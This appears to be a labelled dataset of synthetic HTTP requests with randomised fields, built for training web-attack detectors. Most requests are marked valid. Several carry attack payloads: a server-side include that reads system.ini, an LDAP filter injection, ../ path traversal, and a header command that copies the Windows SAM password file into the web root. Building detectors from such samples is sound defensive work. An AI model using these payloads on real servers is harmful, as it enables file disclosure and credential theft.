Accept-Encoding: gzip, deflate;q=0.1, gzip;q=0.6
Cache-Control: no-store
Cookie2: $Version="869"
If-Unmodified-Since: Tue, 20 Jul 04 03:43:06 UTC
If-None-Match: "Ghzz_Aw5p0pEDjS13"
Max-Forwards: 669
Proxy-Authorization: Digest response="F531DDD5A24E995fc09BDaC7f5fFdc4e"
Referer: /utsaoDG/I8trh5d/Hb3wderL/Icr2TtJl/maopai.nsf
TE: chunked;q=0.0,trailers
Trailer: TE
User-Agent: 192.176.122.160   |    copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\sam.ddd
Via: hzes/7.8 108.211.80.164, 6.4 www.gkaonra.css
Transfer-Encoding: identity

null

End - Id: 42799
Start - Id: 10372
class: Valid
GET /ljODgM-bPq-dnUIw3/Ss/wn/MSuee/Nk8UZincludenodeQ/eJY.shtml?ukfC2m=uh4racceptoU%7CRinclude9e&tatsa=21&j6DaF0@=tb&Yha=05&eEndtan35EolygS=1&orolaieuen3=tev+nin3nIknoWi%7CDt HTTP/1.1
Host: 178.62.128.226
Connection: keep-alive
Accept: video/*;q=0.8, audio/basic;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 252.120.69.113
Cookie: rstLqrLA=6325;Ms=let e;te= connect zib
Cookie2: $Version="123"
Date: Sun, 07 Mar 10 22:24:12 UTC
ETag: "sByQXNmRkfJlEGc"
Expect: 100-continue
From: 5rOh@ndsafsvOY.ch
If-Modified-Since: Fri, 29 Sep 06 14:18:22 UTC
If-Unmodified-Since: Tue, 23 Jan 07 21:36:48 GMT
If-Match: *
If-None-Match: *
If-Range: "THD.IW05Orlb6xeGu"
Max-Forwards: 7065
MIME-Version: 3.9
Pragma: eshdeo='attn8sp'
Proxy-Authorization: Digest algorithm=MD5
Authorization: NTLM N2Vnd2NsbnU3aG1uZW90bjFibjdqdHR0bGllb2lUZWtac3djbmVz
Range: 3188-815,-07
Referer: /haethdwt/zmlsdnyY/stTnhi/ws636U/tteretbs.swf
TE: chunked,trailers
Trailer: From
User-Agent: Mozilla/2.9 (Windows; U; WinNT 6.4; lq-ia; rv:3.0.0) Gecko/40775530
UA-CPU: 68000
UA-Disp: 329,0706,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 0886x482
Via: HTTP/6.4 www.s5kahdH.tiff, HTTP/7.2 253.83.23.6
Transfer-Encoding: identity
Upgrade: 7heR/5.0
Warning: 627 www.brdRijj.html:96201 "nn2tlyihepU" "Mon, 21 Feb 05 15:12:00 GMT"
X-Forwarded-For: 180.232.254.90
X-Serial-Number: 780593
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10372
Start - Id: 12845
class: Valid
GET /i4AO4f1iO/t8lsLdqddhude/dsssstaa/s9tJdjUBK5m88VCpsyPu/aMnYhyp/wttcu0nesobrmsav/izIP6aqX2/httpQPUwS9jDbetweenoCn.h/.execFhttpskHu9u48ovBL.asmx?12rttrceemroOe=r&-jEKPI=emstwAees%285+mwthsock_streamor&ApibsU=saezern%3B%40ys%2Bs-%5Cs&icnss=0486989&tedm9de2eow=102&aGzkXW=toeheTs&ft=tEvhlfa&bsaqs=un&rgeIgreftrn=2&nWoomn=820840805&T6ruehudWfswa=yerHla HTTP/1.0
Host: 145.213.158.248
Connection: close
Accept: */*
Accept-Charset: macintosh;q=0.6, utf-7;q=0.0, big5;q=0.4, big5, big5;q=0.0
Accept-Encoding: compress, deflate;q=0.7
Accept-Language: *;q=0.8
Cache-Control: min-fresh=370
Client-ip: 100.64.54.199
Cookie: slFdmshe=945346181;iTe3sdy=oYteot7el;zmochaFJXxH8tz=ts;bypi=aassrechhstsr3o;byNgad=tmd;yoatLes=ncLewe0aeHaamae9ts
Cookie2: $Version="875"
Date: Wed, 25 Jun 08 09:20:59 GMT
ETag: "WU-5gxwcCX1t42G2qlC"
Expect: tbcewaEG
From: iirE@eyRmP2.biz
If-Modified-Since: Thu, 02 Mar 06 19:33:49 GMT
If-Unmodified-Since: Sun, 15 Aug 04 06:04:56 GMT
If-Match: *
If-None-Match: "KvRqI-DIn1hWrNw"
If-Range: "pUXiYpH3If.YPIoT"
Max-Forwards: 72
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Basic ZG5yVzphZGxldHk=
Authorization: Basic YXRpZzptb2Jhc3Q0
Range: 070-,630507-,-89778
Referer: /tnoanwi1.php3
TE: deflate,chunked;q=0.6
Trailer: Host
User-Agent: Mozilla/6.2 (compatible; MSIE 7.0; Open BSD i586; ilaiy8mRa; ssiirsdte6)
UA-CPU: Sparc
UA-Disp: 6911,855,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0320x5347
Via: HTTP/4.3 173.95.28.83, 5.9 www.n4at6oa8.png, 1.8 141.111.249.172
Transfer-Encoding: lyea1t
Upgrade: zoadt/1.0
Warning: 023 46.69.92.183:144 "hntstronN5s42o" 
X-Forwarded-For: 126.193.58.111
X-Serial-Number: 267270605384116
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12845
Start - Id: 33881
class: Valid
PUT /oet5ejqmxo8ttid5ost/emyd3yasaudotst/bht9sat81soolGRs7/t1A-aN-oxf.shtml? HTTP/1.1
Content-Length: 69
Content-Language: ade,hira
Content-Encoding: identity
Content-Location: /ltee0x.jpg
Content-MD5: aWpldWNycGhyN3QzbXpxbg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 14 Mar 05 18:09:34 GMT
Last-Modified: Mon, 27 Mar 06 15:56:39 UTC
Host: www.bG9stf.uk:80
Connection: keep-alive
Accept: audio/basic, video/*, image/*;q=0.8
Accept-Charset: iso-8859-9, iso-8859-7;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: min-fresh=5
Client-ip: 121.114.131.224
Cookie: bToAl=767;T5tSa374=o/y@r ec0a($log q;dfxTiEkza=@s;wrntnrtdsSdmhr=t;kn87eta5ybc=26320;pedIed1h3hre=msAlvkeanm1
Cookie2: $Version="768"
Date: Mon, 03 Mar 08 13:51:09 GMT
ETag: "koNupbe3Po_6PL5Wt18"
Expect: 100-continue
From: tietc@t0ytt.net
If-Modified-Since: Wed, 25 Oct 06 15:25:30 CET
If-Unmodified-Since: Fri, 03 Sep 04 10:31:44 CET
If-Match: *
If-None-Match: "e9.bJCcYH4p-OfZXKyw0"
If-Range: Sat, 20 Jan 07 20:00:37 CET
Max-Forwards: 3
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="xuyiars"
Authorization: les4s rtcIc=tswor
Range: 10-81
Referer: http://www.edraU.org/b9leotw4/ooel87r/eE8hrp2h/uAhten/6niaEtiu.zip
TE: trailers,deflate;q=0.9,trailers
Trailer: Proxy-Authorization
User-Agent: i.QJP0d http://www.oe6c.org
UA-CPU: x86
UA-Disp: 4768,0511,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 1982x002
Via: HTTP/9.5 www.uaslgxto.css:61351, 4.1 142.35.236.234, 4.8 www.Ccsda6r.gif
Transfer-Encoding: oyut; R5yml=uleaxEei
Upgrade: 1heem/5.4, eot/5.0, kci2K/9.9, nTh/3.0
Warning: 000 www.c3iij.png "rqsmxid" "Fri, 27 Jun 08 12:00:25 GMT"
X-Forwarded-For: 242.67.177.66
X-Serial-Number: 500728161806520
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

ueJarR=6951&rlcsr=505845636&oeHRallahttpFXd=\(@&oinh6ElIkp=7010

End - Id: 33881
Start - Id: 11265
class: Valid
GET /sG9oLL5a0_7iVmEHV/fEoDbrj86tslD5tPeita/eTI0a/Fei/nn.ZhnP3qhHNFcZf/n5eiuwteeaacs/Rdt5Mitwnkbyxs.jsp?aqakhsljwit0=er6o&3onod8w=%3Fezl%26iki%3EK%7EceU&a0tpT3at=4787&fsOtknccae6iael=cWlNi0&nt2na2cst=t6eit&daen=4&eapdwoeahe=0748&sswr=cboh0usrnetcatstdinfytcT3aexece&y8csmrHslsh=fPz8luAN3n.r HTTP/1.1
Host: www.Ndort.ch
Connection: keep-alive
Accept: image/*, application/*, audio/*;q=0.2
Accept-Charset: iso-2022-jp;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: min-fresh=3397
Client-ip: 153.188.24.187
Cookie: nCsweefw7Etn=4winnt6v
Cookie2: $Version="0"
Date: Sat, 08 Sep 07 15:07:52 CET
ETag: W/"@qV_Ge1FmVOp5e@3kn8"
Expect: e7exuse9
From: udeo@jot2xbpben.it
If-Modified-Since: Thu, 25 Mar 04 20:04:13 GMT
If-Unmodified-Since: Wed, 26 Jan 05 18:51:09 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 12 Aug 04 22:26:26 UTC
Max-Forwards: 1
MIME-Version: 3.7
Pragma: g='laaukss7'
Proxy-Authorization: Basic b2xyYm9jYzp1bHVldFQ=
Authorization: NTLM cmFzSHNlWWFBSHJraGw5b2VzcnpUcG9uSXJ5b09jZXB3
Range: 394051-208299
Referer: /eiint.dll
TE: chunked
Trailer: Pragma
User-Agent: Mozilla/3.5 (Machintosh; U; PPC Mac OS X 2.8; Dr-h9; rv:7.2.7) Gecko/66951095
UA-CPU: PowerPC
UA-Disp: 2659,0505,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 234x2210
Via: HTTP/5.3 186.104.173.233:8157, 3.3 www.hemnecti.gif:161
Transfer-Encoding: mEuaq; wnhadsq=e9gsn
Upgrade: ezh/4.9, hQouO/8.3, Ttomi/2.4, iind/9.4, umvntb/3.3
Warning: 337 216.50.53.199 "osavyeiduatyteha" "Tue, 27 Apr 04 05:08:34 GMT"
X-Forwarded-For: 161.180.94.113
X-Serial-Number: 7492268797432274
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11265
Start - Id: 34355
class: Valid
PUT /UmSXRy92/mrhgne/yAB2/rNMUTMp9uc2nK8Db4-/ij/ewE7baa7ys1cu/uH/Nnyd/mOpejNtaeR/uuoarosh5E/aYGGg6ye/aJVNMOOVjneiqt_f.shtml? HTTP/1.0
Content-Length: 161
Content-Language: mNswqssi,ldc
Content-Encoding: identity
Content-Location: http://www.ise08nee.net/OAene.msf
Content-MD5: aGNpbnJzZXV5aXN0c3lvSQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Jun 05 04:35:11 CET
Last-Modified: Sun, 09 Apr 06 06:38:05 CET
Host: www.fdeebn.gov
Connection: weokUHor
Accept: */*;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: identity;q=0.3, compress;q=0.9, deflate;q=0.7, deflate;q=0.3, gzip
Accept-Language: z5e-tafVtb5, dewd-z;q=0.8, cef6s-se;q=0.2, rksi-ps;q=0.4
Cache-Control: max-age=2
Client-ip: 27.119.219.151
Cookie: i3=O$i
Cookie2: $Version="527"
Date: Fri, 25 Feb 05 23:47:31 UTC
ETag: "xQhCnt_qs_NSJo2Hg"
Expect: egeinNtr
From: hehAcdtC@Txn2aT.com
If-Modified-Since: Wed, 20 Oct 04 17:49:28 CET
If-Unmodified-Since: Wed, 22 Jul 09 04:46:14 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 04 Jul 04 17:48:30 UTC
Max-Forwards: 0
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Basic NzRhcEg1bzplT2Uz
Authorization: Basic b2FncXdybjp5bkwwZQ==
Range: 780-7889
Referer: http://eejta.uk/lqotsHea/ttwueej/eLrbme.php3
TE: trailers,chunked;q=0.0,trailers
Trailer: User-Agent
User-Agent: Mozilla/5.2 (Windows; U; Win98 8.3; ai-d9; rv:9.1.9) Gecko/59314365
UA-CPU: Sparc
UA-Disp: 6654,1299,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 015x732
Via: 6.2 120.93.225.96
Transfer-Encoding: cntdo
Upgrade: eoutbj/8.4, dau/7.9, Igo/3.3, ugequ/9.4
Warning: 293 www.rtrRiite.jpeg "jjzdARr7habhta13" "Sun, 15 Jun 08 16:27:29 UTC"
X-Forwarded-For: 114.98.89.168
X-Serial-Number: 418428957866
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Lseaeaa=T5Suctadbvrtt&mn=0&ndneNhd5=cwIg-KXNFejN&aeisoOietenMrez=uteuIWavjp8r7ti&xc99=tln1aelh2rhafd&unionJboot.iniHz359.Sub=85&g9isetylBaetlac=5tm&ecssynAir=026

End - Id: 34355
Start - Id: 8693
class: Valid
GET /Y3bodyw/lA/toyarNq1hbcbAealO/o4W/hwnvsxtadpe/erlMSd4lX@aX6/semofErl9b/lUdCOx6M/dGjhZMJB5OlCqApQh/tgx/k0Ir-A8a.tiff? HTTP/1.1
Host: 86.0.147.230:7867
Connection: close
Accept: */*
Accept-Charset: windows-1258
Accept-Encoding: gzip;q=0.5, deflate;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 173.156.22.51
Cookie: ZorMRtmp=sdc;dEl1nnStEA=143657;s-7B=be;ebrrinoelleu=esf3eId;Rocriqtjt=qp;ndsd0dznraik=Leny
Cookie2: $Version="55"
Date: Thu, 09 Apr 09 24:00:27 UTC
ETag: W/"iEY.oi6B6Dsil3ru0"
Expect: 100-continue
From: abHee@dqDytats.biz
If-Modified-Since: Wed, 20 May 09 19:34:05 UTC
If-Unmodified-Since: Tue, 15 Jun 04 17:42:58 CET
If-Match: "Nm1SL8a321nhjIeJ"
If-None-Match: "RQOacf_oWTP-XOApXa_y"
If-Range: *
Max-Forwards: 2
MIME-Version: 5.6
Pragma: poefdG='NoEh3'
Proxy-Authorization: iaays9 2e7s=dduas8it
Authorization: Basic aWNMZTp0NjlsdGtyeA==
Range: -1251,-8,78356-
Referer: /todrnh5e/awnx.jsp
TE: chunked;q=0.6
Trailer: Accept-Charset
User-Agent: Mozilla/4.3 (Machintosh; U; PPC 7.1; Ns-tj; rv:9.9.0) Gecko/30319263
UA-CPU: PowerPC
UA-Disp: 8125,063,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8393x485
Via: 1.1 157.80.207.101:07, HTTP/1.6 7.9.86.65
Transfer-Encoding: deflate
Upgrade: 81ihR/9.8, iiess/1.4, hse/9.5
Warning: 642 www.n84b.htm "lyajg" "Mon, 15 Jan 07 21:15:54 UTC"
X-Forwarded-For: 142.15.151.110
X-Serial-Number: 396730650206
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 8693
Start - Id: 10378
class: Valid
GET /QqSB_mochayN/fo2er/tttrpuw3vtieue1yrvwn/nyte/htn/oN/sirt8aaae1mhrus/6s/mXO1Vb_RXoK/YRJMw/nI/5zossto.swf?Aettnro1a6tph=rB_yYvUr&7eirtmogWo=pei-%2F&ACbdmCupdateM=5wmeU&9attai0teno=awrmlY43QP&ioesEsnu=gtfetagIrTi&a3Lf=y.Z&RrnseeEt9=esoa118rie&luddrers7=56&oish=%3B&eeifWerc=gvi3t&t0c9xeg=onw7%3Esutnh7dlsd&ss5rIbgagu=tTbody HTTP/1.1
Host: www.mepthet.fr
Connection: close
Accept: audio/x-wav, audio/x-wav;q=0.2
Accept-Charset: iso-2022-kr, cp-932;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 52.229.71.170
Cookie: isinh=q2LT1E.Ho4r;aif7mG2pt=mfhor/;4oHuEiis=dertSipnawwhx0p01r
Cookie2: $Version="123"
Date: Thu, 11 Sep 08 02:47:00 UTC
ETag: W/"Owfp3iumNPdq3uhc9"
Expect: 100-continue
From: 5rOh@ndsafsvOY.ch
If-Modified-Since: Sat, 13 Jun 09 18:52:19 CET
If-Unmodified-Since: Sat, 15 May 04 05:52:30 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 21 Oct 09 20:42:51 UTC
Max-Forwards: 40
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Digest opaque="imial"
Authorization: Basic bm9hZ2Q6dnIybw==
Range: 410-883933,0-
Referer: /here/tions/obdWut/C73teob.gif
TE: chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/4.1 (compatible; h1sleFIe; Linux i386; ozoinfoy; nnwamctR)
UA-CPU: MIPS
UA-Disp: 329,0706,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 0886x482
Via: FTP/0.1 www.psove.shtml:9937, 5.1 231.82.190.72, 9.9 157.118.56.176:3618
Transfer-Encoding: gzip
Upgrade: gtg/0.1
Warning: 485 www.hfenR9bs.gif "Fitc0D" "Fri, 21 Nov 08 06:43:01 UTC"
X-Forwarded-For: 180.232.254.90
X-Serial-Number: 664473
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10378
Start - Id: 2276
class: Valid
GET /esish94f3/f8UtMcnlRyy.v/ekhtnhdd4aoagd/includeS_@6yLPg/j_POUSbetDz3vp.asmx?oHemeofd7sdhr=7&lcoNesctzt=haw&arcc=dnph-l%2Fc%3Eeerlib+ho&i04szorethcuiIi=likea&obocxr8Ra=hg6roy5sicts8i&ie=ufenernxo%40betweentcz HTTP/1.0
Host: 159.5.141.127
Connection: close
Accept: image/png;q=0.2
Accept-Charset: utf-8;q=0.6, iso-8859-15;q=0.4
Accept-Encoding: 
Accept-Language: a65o-hbeejtNi, tetat-Uj;q=0.9, moF-Nmo, 93alsba4-nra0v;q=0.9
Cache-Control: no-store
Client-ip: 111.99.151.212
Cookie: VG9ZMiadminwinntdLDP=emboot.iniiayss];1CacceptV=t;i1jsi8evfspo=1271767;OkfbO=rdn tamNh8linkodrHe;PcKY1H.SLrcp=6860;hajvnrYj6sr=ud
Cookie2: $Version="88"
Date: Mon, 10 Aug 09 10:09:35 CET
ETag: "czBkLOu.NNn9-8RH"
Expect: 100-continue
From: aetpir@0smuinHo.ch
If-Modified-Since: Tue, 28 Feb 06 06:06:57 CET
If-Unmodified-Since: Fri, 25 May 07 13:24:02 CET
If-Match: *
If-None-Match: "7i4xDfVXt5a6ZU5E"
If-Range: *
Max-Forwards: 7987
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM NnRsM2NyeWlrZXJ0dW9udHRvN2JhaW11UzVtZVhhc2Vob2gwZTZobFM=
Authorization: Basic a2U0ZXVsOWg6bG1lZg==
Range: -458438,6075-5448
Referer: /ooSle4n/eBth6aa/eleem/aUe1cd/drodyhn.exe
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/2.8 (X11; U; Linux i386 1.7; hr-t9; rv:7.4.9) Gecko/16713272
UA-CPU: StrongARM
UA-Disp: 006,895,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6264x742
Via: 3.2 252.104.74.87, Mrt/5.9 0.3.255.79
Transfer-Encoding: identity
Upgrade: b9bb/0.5, 2tg/1.8, 8lrhz/6.1, alsbbg/0.9
Warning: 557 208.167.228.147 "bHaRObeett" 
X-Forwarded-For: 191.123.48.69
X-Serial-Number: 61486796053346804
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 2276
Start - Id: 40491
class: SSI
GET /eZMTrGUPcu0/neaosoa8ue7ec5/q_5KKzxRH/it3/dFXI15UqEr/oP6BbCcCUYfqRjX1usi.gif?niiTosU=%3C%21--%23include+++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22--%3E HTTP/1.0
Host: 85.226.214.120
Connection: nienCe
Accept: */*
Accept-Charset: x-mac-ce, big5;q=0.0, x-mac-hebrew
Accept-Encoding: compress;q=0.8, compress, gzip, identity;q=0.5, deflate;q=0.3
Accept-Language: FoN-wsSrea
Cache-Control: e7reAed=V
Client-ip: 191.31.19.42
Cookie: euler=anWkX;qclea7idbfnA=0809
Cookie2: $Version="1"
Date: Sun, 09 Nov 08 24:43:15 CET
ETag: W/"2I2TG1yCP5g9eFfUR"
Expect: 100-continue
From: 8low4er1@ewrsnfl.uk
If-Modified-Since: Thu, 27 Oct 05 04:28:34 CET
If-Unmodified-Since: Sat, 23 Apr 05 22:54:20 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Basic ZWx0cnVFYTo1ZWRkb2Vj
Authorization: rrnqhw estl=itgn9g
Range: 74842-61,9795-78
Referer: http://www.llvtehr.st/xweaaIy/s5svo.php
TE: trailers
Trailer: Warning
User-Agent: Enshudy86i (1cduzUVHm; 5fZm4T2i; rSwI.8vC; eqVGhijp.M; o0emz_2)
UA-CPU: StrongARM
UA-Disp: 609,4490,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0287x026
Via: eher/2.1 254.73.255.185:22014, 5.1 www.ayuirid.htm
Transfer-Encoding: 01nt
Upgrade: eiHn/0.0, mn7n9/4.3, Nko/4.4, wda/1.3, 7itb/8.4
Warning: 074 www.Paeas.jpg "itu3brrfrgi6re2o3th" 
X-Forwarded-For: 50.57.73.228
X-Serial-Number: 253677
----: ----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 40491
Start - Id: 39114
class: LdapInjection
PUT /aA5wrUF3mfwG/eCpauj8cfRQM2/Eiheqyhtepnzadue/s-Z2m/e_u0QM@QROMNPVSin/oD6GTJKNE3rjMBIHQEz/Sxp_/4eoymsri4xdgkgna.tiff? HTTP/1.0
Content-Length: 263
Content-Language: i,irePh,hF2EN1h
Content-Encoding: identity
Content-Location: /n5sBrg/8ulEie/dsq9eo.txt
Content-MD5: ck5laTBhaGhlaWo2U2VybA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 28 Jun 06 18:44:39 UTC
Last-Modified: Mon, 14 Mar 05 01:48:46 GMT
Host: 200.188.164.221:80
Connection: close
Accept: text/xml
Accept-Charset: x-mac-greek, windows-1253;q=0.1, x-mac-cyrillic, cp-936
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 223.45.213.191
Cookie: Idehyts2lotdo=3acceptszadminttc5Vr6@nxterm;ie2ogogslnotwe=ed5Nes>mnT6oMhrni ;s1rv=90631;ceomjpvaec=) (|    (displayName=had*)    (name =  had*)( mail=had*   );oMclzetoaet1un=wgoE0.-GsDt;dgd=uthelowusstxolsunv
Cookie2: $Version="8"
Date: Wed, 28 Dec 05 23:23:56 GMT
Expect: 100-continue
From: moUa@aWtec.biz
If-Modified-Since: Wed, 10 Jun 09 07:26:20 CET
If-Unmodified-Since: Wed, 28 Jan 04 14:28:35 GMT
If-Match: "VXKuOh3uxLnZ1Elp9"
If-None-Match: *
If-Range: Tue, 31 Mar 09 07:33:47 UTC
Max-Forwards: 4189
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: eFDr4 tnpehf=6liout
Authorization: eridEi EimEu=aomgami
Range: 648-
Referer: /eb9tw/sbyeor/aattStt.gz
TE: trailers
Trailer: Date
User-Agent: enfiuiahY (oMd4@dRK; r2FGf9UtI; 9PjxzYO)
UA-CPU: Sparc
UA-Color: color32
UA-Pixels: 7722x806
Via: HTTP/6.2 154.147.244.76, 9.6 2.114.137.195, 6.0 www.ei9rh.gif
Transfer-Encoding: gzip
Upgrade: qh5sne/2.6, 4nbgo/3.9, dnda/5.1
Warning: 215 www.tH6orimn.htm:412 "ec8l" "Sat, 30 Jan 10 05:43:13 CET"
X-Forwarded-For: 37.38.5.148
X-Serial-Number: 733492432548520
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dr=%u&oPgeeqytaRewr1=zise&Nts=22271229&Q@5K=sitrnlaecea&tezs=ch3gaPls&aerHasd9wcQg=oy&tAaaeH=813110&otanooodn=|r?Dmi-sock_stream2+&vetlr0Ohsua= f&azoh5z2bir=s8Dj8IEARtlt&or=a_B&eAyuDE@samapX=35&lsec=u3nt drhnuete&trshaB7aord=l2wheree)cgeueea%p:4trh0

End - Id: 39114
Start - Id: 16482
class: Valid
GET /1wTmQQ/6Ahehie2cuR/dinox/4ee4aj/hn6A6.asmx?aou3uccoa5ni=gOu&MTjxY1f=ra2_aS&asyt=wp-%2Bc%3Dc&roefttA=onnn HTTP/1.1
Host: www.ietsC21eli.biz:26837
Connection: keep-alive
Accept: application/*, application/*;q=0.1, application/rtf;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=21655
Client-ip: 237.89.204.8
Cookie: 4sbMUvJG=6
Cookie2: $Version="1"
Date: Fri, 16 Sep 05 01:17:41 GMT
ETag: W/"PfRciWS9of8EULYeN3@z"
Expect: afoOaee=ibrbtE
From: enneeci@ehirrnmall.it
If-Modified-Since: Sat, 07 Mar 09 15:29:39 GMT
If-Unmodified-Since: Thu, 18 Oct 07 12:49:05 GMT
If-Match: "hnil.nI4lE1zUM53F_v"
If-None-Match: "IEjByDr55h87IgXte"
If-Range: *
Max-Forwards: 4
MIME-Version: 3.8
Pragma: 8ia=aoCxlO
Proxy-Authorization: NTLM cmxwZ2E1eGdUTmdzNmVydGdib2VyczVyc3RhdG9pc2k=
Authorization: Basic dm9zVjphaGZ1YWU=
Range: 6367-5472
Referer: http://ets0h.cz/dsoe9wse/eTies/6f0irfao/asvns.asp
TE: trailers,deflate
Trailer: Authorization
User-Agent: Mozilla/4.5 (compatible; MSIE 3.6; SunOS sun4u; ooutI; att990sie)
UA-CPU: StrongARM
UA-Disp: 097,580,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 6158x1719
Via: HTTP/1.0 www.mps3.html
Transfer-Encoding: identity
Upgrade: stdm/8.2, nyada9/9.8, Hlft/8.4, sarer/8.3
Warning: 543 www.tjetzkwe.png "ctadem" "Wed, 01 Aug 07 06:58:08 GMT"
X-Forwarded-For: 59.247.137.64
X-Serial-Number: 764868889317962495
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16482
Start - Id: 45005
class: PathTransversal
GET /yd3rIpacrr/ucucx/aeeeebtt5qikeiero.gif?ee=hrtetsDip+e&qdco=agR1nr&7rfnmntimmoaa=usnNh&@W.8D=sEgAL&rtq9t=37346&gus=v%40I0_m&mxgkuuhzE=017687&seteeeeactr=.%2F..%2F..%2F..%2F..%2F..%2F&8nbtdyo2koiSiev=07069746&X.IntmpS=86&pKevalt_S0=3&aronraR=14521287 HTTP/1.0
Host: www.sdenab.gov:80
Connection: keep-alive
Accept: image/gif, image/*;q=0.5, text/*;q=0.1
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 112.221.77.108
Cookie: 6b6S48GO=bGQ
Cookie2: $Version="13"
Date: Fri, 27 Nov 09 17:20:15 GMT
ETag: "06Aqq7j6Gd0C_dK"
Expect: 100-continue
From: SiHai3@Rl2imga.fr
If-Modified-Since: Sun, 08 Apr 07 22:39:59 CET
If-Unmodified-Since: Sun, 08 Feb 04 12:04:06 UTC
If-Match: "LHIPS74OafuYcVg.J"
If-None-Match: *
If-Range: "FzYKzj_X7HEONkjN0K3p"
Max-Forwards: 4126
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic b3RkdDJlYTc6bWlhVG41RUE=
Authorization: Basic cmdjaXJiYWw6UnRsdHA=
Range: 2613-116,8-,0-
Referer: http://alhhehOi.de/o4T4ieje/rs60/cemww/hsfr/uhe5.tiff
TE: chunked;q=0.2
Trailer: Max-Forwards
User-Agent: Mozilla/7.5 (Machintosh; U; PPC Mac OS X 6.1; tt-Iq; rv:4.5.3) Gecko/29776478
UA-CPU: StrongARM
UA-Disp: 681,0111,16
UA-OS: FreeBSD
UA-Pixels: 569x3212
Via: 8.8 197.52.0.15:1, 8.2 179.204.73.161:620, 8.0 www.yreq.css
Transfer-Encoding: identity
Upgrade: Eubq/3.7
Warning: 841 177.253.103.43 "siish1237R9c5ebtn" "Mon, 07 Dec 09 02:26:19 UTC"
X-Forwarded-For: 2.2.77.25
----: --------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 45005
Start - Id: 12766
class: Valid
GET /oimohmbiJvep/oSzHjjrlIRJ/in1sBi/ftfYqPZ/ocssawwl/baerhbt3ewmanscafWS/WvarYDOzjS5metaqK/ekyz/tu93ipfneUenTes0o2l/cvAOax4IEix/biaIadls0olcws/hd4f.mdb?atNnjeztr95wp=rBCev&ssodxjrnmre0d=aBrfrerFu%26-l&J1cM.XGy4w=egzQyaQD.&ndwoaoesndarwne=9&cl5rtqedwloce=ymacdnSa5qlesM HTTP/1.1
Host: 133.105.148.168:293
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.9, deflate;q=0.6, gzip;q=0.1, compress
Accept-Language: *
Cache-Control: no-cache
Client-ip: 4.223.155.209
Cookie: Bebinoaplfar=sCteanay6mntttye1;nlosaPostxfcey=3407;ngtmpas24q=e0om;SXJsYX@0=uz
Cookie2: $Version="859"
Date: Thu, 25 Aug 05 02:28:12 UTC
ETag: W/"7U8lCc@WbWyv_96wzX"
Expect: wsaoe
From: ahe6lcme@tscunoU.st
If-Modified-Since: Tue, 01 Sep 09 04:14:27 CET
If-Unmodified-Since: Mon, 30 May 05 01:57:16 GMT
If-Match: "5ER9HoffBqh@r.iX"
If-None-Match: *
If-Range: "zcx07QO8FhZ_bJf1I3D1"
Max-Forwards: 50
MIME-Version: 9.5
Pragma: fpe='ncq'
Proxy-Authorization: eqxrte snsH=briit
